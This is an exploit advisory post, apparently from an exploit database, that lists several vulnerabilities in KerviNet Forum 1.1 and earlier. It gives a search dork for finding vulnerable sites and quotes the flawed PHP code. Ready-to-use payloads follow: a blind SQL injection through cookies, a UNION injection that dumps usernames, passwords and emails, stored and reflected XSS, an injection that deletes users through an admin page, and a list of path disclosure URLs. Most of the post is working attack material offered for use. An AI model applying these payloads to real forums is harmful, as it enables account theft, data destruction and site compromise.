KerviNet Forum <= 1.1 Multiple Remote Vulnerabilities

Exploit Code :

dork: "Copyright KerviNet"
eLwaux(c) 20.06.2009

## ## ## ##
Blind SQLinj
/index.php
---------------------------------------------------------------------------
----------------------
if($_COOKIE['user_enter']=="auto") {
$enter_login=$_COOKIE['enter_login'];
$enter_parol=$_COOKIE['enter_parol'];
$mysql->query("SELECT name, pass, status FROM users WHERE name =
'".$enter_login."' AND pass = '".$enter_parol."'");
---------------------------------------------------------------------------
----------------------
exploit:
COOKIE: user_enter=auto
COOKIE: enter_login = abc
COOKIE: enter_parol = ' or name = (select name from users where
id_user=1) and '1'='1';
sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc'
AND pass = '' or name = (select name from users where id_user<10 limit
1)

## ## ## ##
SQLinj
/message.php
---------------------------------------------------------------------------
----------------------
9: $topic=$_GET['topic'];
18: if($topic) {
69: $mysql->query("SELECT name, viewing, voting, status, top_status,
id_forum FROM topics WHERE id_topic = ".$topic);
exploit:/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pa
ss,email),3,4,5,6+from+users
---------------------------------------------------------------------------
----------------------

## ## ## ##
SiXSS
/message.php
exploit:/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users

## ## ## ##
aXSS
/add_voting.php
---------------------------------------------------------------------------
----------------------
22: $topic=$_GET['topic'];
61: if($topic) {
66: $forum_edit->add_voting($time, $topic, $v_vopros, $variants);
74: }

function add_voting($time, $topic, $v_vopros, $variants) {
global $user;
global $user_ip;
if($user) {
global $mysql;
$mysql->query("UPDATE topics SET voting = 1 WHERE id_topic = ".$topic);
$mysql->query("INSERT INTO v_name VALUES (0, '".$v_vopros."',
".$topic.")");
$id_vname=mysql_insert_id();
for($i=0; $i<count($variants); $i+=1) {
$vr_nom=$i+1;
$mysql->query("INSERT INTO v_variants VALUES (".$vr_nom.",
'".$variants[$i]."', ".$id_vname.")");
}
}
return $id_vname;
}
---------------------------------------------------------------------------
----------------------

exploit:/add_voting.php?topic=1
POST: add_voting = ok_add
POST: v_vopros = v
POST: v_variant1 = {XSS}
POST: v_variant2 = v2

## ## ## ##
users deleating
/admin/edit_user.php
---------------------------------------------------------------------------
----------------------
$del_user_id=$_POST['del_user_id'];
$mysql->query("DELETE FROM users WHERE id_user = ".$del_user_id);
---------------------------------------------------------------------------
----------------------
exploit:
POST: del_user_id=(select user_id from users limit 1)

## ## ## ##
Path Disclosure
---------------------------------------------------------------------------
----------------------
/include_files/voting_diagram.php
/include_files/voting.php
/include_files/topics_search.php
/include_files/topics_list.php
/include_files/top_part.php
/include_files/quick_search.php
/include_files/quick_reply.php
/include_files/moder_menu.php
/include_files/messages_list.php
/include_files/menu.php
/include_files/head.php
/include_files/forums_list.php
/include_files/forum_statistics.php
/include_files/forum_info.php
/include_files/birthday.php
/admin/head.php
---------------------------------------------------------------------------
----------------------

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason